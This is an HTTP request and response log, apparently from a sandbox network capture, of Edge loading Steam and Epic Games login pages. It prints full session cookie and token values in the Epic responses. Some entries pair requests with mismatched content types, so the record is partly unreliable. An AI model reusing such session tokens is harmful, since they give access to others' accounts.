MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/images/footerLogo_valve_new.png HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: image/png
content-length: 2584
last-modified: Wed, 28 Jun 2023 04:07:18 GMT
etag: "649bb1f6-a18"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 4733
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe498dcd0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/fonts/MotivaSans-BoldItalic.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: application/octet-stream
content-length: 134500
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-20d64"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 5775
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe49bdfe0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/images/ico/ico_facebook.gif

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/images/ico/ico_facebook.gif HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: image/gif
content-length: 1171
last-modified: Wed, 28 Jun 2023 04:07:19 GMT
etag: "649bb1f7-493"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 1736
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe49ce080b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Black.ttf?v=4.015

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/fonts/MotivaSans-Black.ttf?v=4.015 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://store.steampowered.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: image/gif
content-length: 1419
last-modified: Wed, 28 Jun 2023 04:07:19 GMT
etag: "649bb1f7-58b"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 1736
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a7ea00b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/images/ico/ico_twitter.gif

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/images/ico/ico_twitter.gif HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:54 GMT
content-type: application/octet-stream
content-length: 120816
last-modified: Wed, 28 Jun 2023 04:07:10 GMT
etag: "649bb1ee-1d7f0"
access-control-allow-origin: *
x-cache: MISS
cf-cache-status: HIT
age: 4411
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe4a7e9f0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/crypto/jsbn.js

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/javascript/crypto/jsbn.js HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: text/javascript;charset=UTF-8
content-length: 11528
cache-control: public,max-age=783,must-revalidate
expires: Fri, 03 Nov 2023 04:45:45 GMT
etag: "P5-v3JwM3dJd"
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: EXPIRED
cf-cache-status: HIT
age: 227
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feed1f410b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/javascript/crypto/rsa.js

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/javascript/crypto/rsa.js HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: text/javascript;charset=UTF-8
content-length: 996
cache-control: public,max-age=933,must-revalidate
expires: Fri, 03 Nov 2023 04:50:15 GMT
etag: ".2DapVp3yyevw"
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: HIT
cf-cache-status: HIT
age: 535
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feed6f7d0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/shared_english-json.js?contenthash=c4d9c3efdd37b8f4a528

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/shared_english-json.js?contenthash=c4d9c3efdd37b8f4a528 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 24 Oct 2023 22:53:31 GMT
cache-control: public,max-age=15552000
expires: Sun, 21 Apr 2024 22:55:13 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 798906
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feedafaf0b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/sales_english-json.js?contenthash=3986b644cc48d256c2f6

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/sales_english-json.js?contenthash=3986b644cc48d256c2f6 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 10 Oct 2023 22:56:10 GMT
cache-control: public,max-age=15552000
expires: Sun, 07 Apr 2024 22:57:45 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 2008354
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feedffe70b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/main_english-json.js?contenthash=cfd9e67c46d37639a2a9

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/main_english-json.js?contenthash=cfd9e67c46d37639a2a9 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 01 Aug 2023 22:36:05 GMT
cache-control: public,max-age=15552000
expires: Sun, 28 Jan 2024 22:37:45 GMT
strict-transport-security: max-age=300
x-cache: HIT
cf-cache-status: HIT
age: 8057554
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feee08070b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/marketing_english-json.js?contenthash=673368b36f7a8a046c17

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/marketing_english-json.js?contenthash=673368b36f7a8a046c17 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:20 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 01 Aug 2023 22:36:05 GMT
cache-control: public,max-age=15552000
expires: Sun, 28 Jan 2024 22:37:45 GMT
strict-transport-security: max-age=300
x-cache: HIT
cf-cache-status: HIT
age: 2293863
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201feee080a0b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/shared/images/joinsteam/new_login_bg_strong_mask.jpg

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/images/joinsteam/new_login_bg_strong_mask.jpg HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:21 GMT
content-type: image/jpeg
content-length: 124529
cf-bgj: h2pri
etag: "649bb1ef-1e671"
last-modified: Wed, 28 Jun 2023 04:07:11 GMT
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 3228
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fef18ace0b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/login/code_box.png?v=1

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/images/login/code_box.png?v=1 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:21 GMT
content-type: image/png
content-length: 3297
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
etag: "649bb1f0-ce1"
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 2884
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fef1aae50b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/images/login/friendlyname_box.png?v=1

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/images/login/friendlyname_box.png?v=1 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:21 GMT
content-type: image/png
content-length: 3196
last-modified: Wed, 28 Jun 2023 04:07:12 GMT
etag: "649bb1f0-c7c"
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 450
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fef1aae60b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/libraries~9229560c0.js?contenthash=c732aa78930931279b88

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/libraries~9229560c0.js?contenthash=c732aa78930931279b88 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:39 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 31 Oct 2023 22:26:30 GMT
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:28:04 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 195753
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff678ac80b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/chunk~a668b8b40.js?contenthash=c6d55eaa02144af399b5

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/chunk~a668b8b40.js?contenthash=c6d55eaa02144af399b5 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:41 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:55:07 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:56:36 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 2310014
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff705aea0b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/chunk~9c591d16d.js?contenthash=61a3d5bebdea801c5fda

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/chunk~9c591d16d.js?contenthash=61a3d5bebdea801c5fda HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:43 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:55:07 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:56:36 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 2282612
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff7ebf7b0b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/css/applications/store/chunk~9229560c0.css?contenthash=bad700c313ffaf7c2d59

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/css/applications/store/chunk~9229560c0.css?contenthash=bad700c313ffaf7c2d59 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:46 GMT
content-type: text/css;charset=UTF-8
last-modified: Tue, 31 Oct 2023 22:26:30 GMT
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:28:04 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 195760
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff9358440b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/chunk~9229560c0.js?contenthash=459f28cb0ff3e262ab3e

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/chunk~9229560c0.js?contenthash=459f28cb0ff3e262ab3e HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:47 GMT
content-type: text/css;charset=UTF-8
last-modified: Wed, 28 Jun 2023 04:07:18 GMT
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 07:00:42 GMT
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 79084
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff988c320b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/css/applications/store/login.css?contenthash=38bbe7298529efbe4cc8

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/css/applications/store/login.css?contenthash=38bbe7298529efbe4cc8 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:47 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 10 Oct 2023 22:56:10 GMT
cache-control: public,max-age=15552000
expires: Sun, 07 Apr 2024 22:57:45 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 2008380
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff988c300b4e-AMS
content-encoding: gzip
GET

https://store.cloudflare.steamstatic.com/public/javascript/applications/store/login.js?contenthash=513568273e5ce33d7b19

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/javascript/applications/store/login.js?contenthash=513568273e5ce33d7b19 HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:47 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:55:07 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:56:36 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
strict-transport-security: max-age=10368000
x-cache: HIT
cf-cache-status: HIT
age: 2282550
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff99ed160b4e-AMS
content-encoding: gzip
GET

https://www.epicgames.com/id/login

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

GET /id/login HTTP/2.0
host: www.epicgames.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:52 GMT
content-type: text/html
last-modified: Mon, 30 Oct 2023 16:32:20 GMT
vary: Accept-Encoding
etag: W/"653fda94-2022"
content-security-policy: default-src 'unsafe-inline' 'unsafe-eval' 'self' *.epicgames.com *.unrealengine.com *.twinmotion.com *.fortnite.com data: *.launchdarkly.com *.arkoselabs.com *.arkoselabs.cn *.hcaptcha.com *.uetalon.cn ubistatic2-a.akamaihd.net connect.ubisoft.com cdn.cookielaw.org *.onetrust.com static-assets-prod-1251447533.file.myqcloud.com static-assets-prod-ue-1251447533.file.myqcloud.com sentry.io
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
referrer-policy: origin-when-cross-origin
x-xss-protection: 1; mode=block
document-policy: js-profiling
content-encoding: gzip
GET

https://www.epicgames.com/id/api/reputation

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

GET /id/api/reputation HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
accept-language: undefined
accept-encoding: gzip, deflate, br
cookie: _epicSID=37d6c431172443c29eb08662417d4dbb

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:17 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
set-cookie: EPIC_DEVICE=d66fc390f6b0481b8805d83c312d6f48; Max-Age=63072000; Domain=.epicgames.com; Path=/; Expires=Sun, 02 Nov 2025 04:50:17 GMT; HttpOnly; Secure; SameSite=None
set-cookie: XSRF-TOKEN=8f6378f3f668471b88b63f0448b48503; Path=/id
set-cookie: EPIC_SESSION_AP=6nwj1sO5_4kKUiCrEJwebg.jtPxWOAL1QeawyIzRXkSlPqvYpfC7KnPwegv8FPWkpzz3PYkeJgoF4qaZlSSkrAqGdVhgF9eBC1cjFeC28v6C7IFREyTPrx9Ket5AOFAWY0-rJIKNRX0UAYjosw-f2of6HXUEsQGHfDXvFVmfJdc4PJBmDzsIUAwGtrsm5S8TosUpjXppZhT_ZsSNKgLfsRRYI1P_Ke6ClhaE04UdaCAxp_ZMq9LM5uUP3RNsKjSaMcUrVbERQN1eKbKEji1SIOwIx7SoWgfE3tVU91sGfURp55LtOzjRAqsPGeKJgR0mLCvyFe9quyT-82dWgi8APVfDNfKpQdH4cThYRdZUperQWqtZVSudRkJtR2jES5odMLnMAEnNHq1LRvFr3ciw4HyMOFS0z4gImQ95RWc2lmvKiPT3Ql-MVrcpNH9NGRaVt1OnCbX1UQAY4fryX9SWrwo.1698987017148.86400000.FAdCHAxbQ1LdG2lNPIOQdQ; Max-Age=86400; Domain=.epicgames.com; Path=/id; Expires=Sat, 04 Nov 2023 04:50:18 GMT; HttpOnly; Secure; SameSite=None
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"8c-2V3z8rFfhmkTxetnEoxS7JuniKo"
cache-control: no-cache
content-encoding: gzip
GET

https://www.epicgames.com/id/api/location

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

GET /id/api/location HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
cache-etag: eyJhIjoiaHR0cHM6Ly93d3cuZXBpY2dhbWVzLmNvbSIsImIiOmZhbHNlLCJkIjp0cnVlLCJlIjpmYWxzZSwiZyI6IjIwMjMtMTEtMDNUMDQ6NTA6MTQuMDEwWiIsImgiOjIsImkiOiIxZDg2NjhhNzYxMzY1YiJ9
accept-language: undefined
accept-encoding: gzip, deflate, br
cookie: _epicSID=37d6c431172443c29eb08662417d4dbb

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:17 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
set-cookie: EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17; Max-Age=63072000; Domain=.epicgames.com; Path=/; Expires=Sun, 02 Nov 2025 04:50:17 GMT; HttpOnly; Secure; SameSite=None
set-cookie: XSRF-TOKEN=bcbfe2af20c844ccb58e2079da97664f; Path=/id
set-cookie: EPIC_SESSION_REPUTATION=BPn2lLFONWHmN_5jyapvgQ.OUcJMITAjCBLqm4RftA-uSyewQymsbqJsvL9ZFofhD1LZVkH6_QxPcKP2xaELUjPDT__hFHISfezF15rJAMgEIfEqjT1gijzXG8a3t2_9OqOjgwYycpOxLmWZvUUr-SNW2J_-YgOQqPLTwRQ2pfKZV0fhvq_2ugayVZYrqHyfxb4kweo_COWtRVokUlRLTGoXtTCPdnoaGNBwI67jOYH5C0thfZwV-D2n-6G2jKXLjKhF_xVsPRZYa41wFMxDXR_emdi2ThOoi2ZH2kSsL3sW1IrVVTqEBRC2LtCCON6hN6w3qMYbyLwz91A_ptmSJ5B2FOo7LllghkEFRC69xXZTGjaIfOfv-VlRU-F2wNyUNRJwvxEljHYIjShg8_RxaMrJLXcMzMWhlYTGHWpU11XEA.1698987017152.86400000.sEqsjlugBfGynFrgnBwW1A; Max-Age=86400; Domain=.epicgames.com; Path=/id; Expires=Sat, 04 Nov 2023 04:50:18 GMT; HttpOnly; Secure; SameSite=None
set-cookie: EPIC_SESSION_AP=bBw7kwxyoZ-uaCywV7ts0w.Yy_rihNWUeQcxQRZq62s8BHtqTVML2uicDCATyOeimVaVb_NOdzqe6Nbk3hUuT3Grr3Rnhkk_7e8lQJtYwenIb91kOFpboLvOiI2jiLFqc4jmaXZwpxyKkrhLIM6tep4xC5Ff-g0nX0ToGU6ODbWZA.1698987017152.86400000._6Ws0NK52TuLU3DUJSjtrQ; Max-Age=86400; Domain=.epicgames.com; Path=/id; Expires=Sat, 04 Nov 2023 04:50:18 GMT; HttpOnly; Secure; SameSite=None
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"ea-gyU+/NZ2AgBm5ZLHAjjWlqkfKWY"
cache-control: no-cache
content-encoding: gzip
GET

https://www.epicgames.com/id/api/i18n?ns=messages

MicrosoftEdgeCP.exe

Remote address:

34.198.71.3:443

Request

GET /id/api/i18n?ns=messages HTTP/2.0
host: www.epicgames.com
accept: */*
